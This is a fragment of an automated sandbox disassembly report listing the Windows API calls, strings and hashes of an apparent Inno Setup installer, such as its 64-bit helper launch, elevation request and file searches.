                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                                                        • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                                        • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                                        • API String ID: 2323315520-3614243559
                                                                                                                                        • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                                        • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                                                                        • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                                        • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 0045862F
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(021D3858,00000000,004588C2,?,?,021D3858,00000000,?,00458FBE,?,021D3858,00000000), ref: 00458638
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(021D3858,021D3858), ref: 00458642
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,021D3858,00000000,004588C2,?,?,021D3858,00000000,?,00458FBE,?,021D3858,00000000), ref: 0045864B
                                                                                                                                        • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                                                                        • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021D3858,021D3858), ref: 004586CF
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                                                                        • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                                                                        • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                                        • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                                        • API String ID: 770386003-3271284199
                                                                                                                                        • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                                        • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                                                        • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                                        • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                                          • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                                          • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                                          • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4), ref: 004783CC
                                                                                                                                          • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                                          • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021D2BD4,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                                                                        • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                                                        • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                                                        • API String ID: 883996979-221126205
                                                                                                                                        • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                                                                        • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                                                                        • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                                                                        • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                                                                        • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1631623395-0
                                                                                                                                        • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                                        • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                                                                        • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                                        • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 00418393
                                                                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                                                                        • GetWindowRect.USER32(?), ref: 004183CC
                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                                                                        • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                                                                        • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                        • String ID: ,
                                                                                                                                        • API String ID: 2266315723-3772416878
                                                                                                                                        • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                                        • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                                                                        • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                                        • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                        • API String ID: 107509674-3733053543
                                                                                                                                        • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                                        • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                                                        • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                                        • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                                                                        • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                                                                        • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                                                                        • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CryptVersion
                                                                                                                                        • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                                        • API String ID: 1951258720-508647305
                                                                                                                                        • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                                        • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                                                                        • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                                        • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                                                                        • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$AttributesCloseFirstNext
                                                                                                                                        • String ID: isRS-$isRS-???.tmp
                                                                                                                                        • API String ID: 134685335-3422211394
                                                                                                                                        • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                                                        • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                                                                        • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                                                        • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                                                                        APIs
                                                                                                                                        • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                                                                        • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                                                                        • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                                                                        Strings
                                                                                                                                        • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                                                        • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                                                        • API String ID: 2236967946-3182603685
                                                                                                                                        • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                                                        • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                                                                        • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                                                        • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                                                        • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                                                        • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                                                                        • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                                                        • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 00417D0F
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Placement$Iconic
                                                                                                                                        • String ID: ,
                                                                                                                                        • API String ID: 568898626-3772416878
                                                                                                                                        • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                                                        • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                                                                        • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                                                        • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                                                                        • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4011626565-0
                                                                                                                                        • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                                                        • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                                                                        • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                                                        • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                                                                        • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                                                                        Memory Dump Source
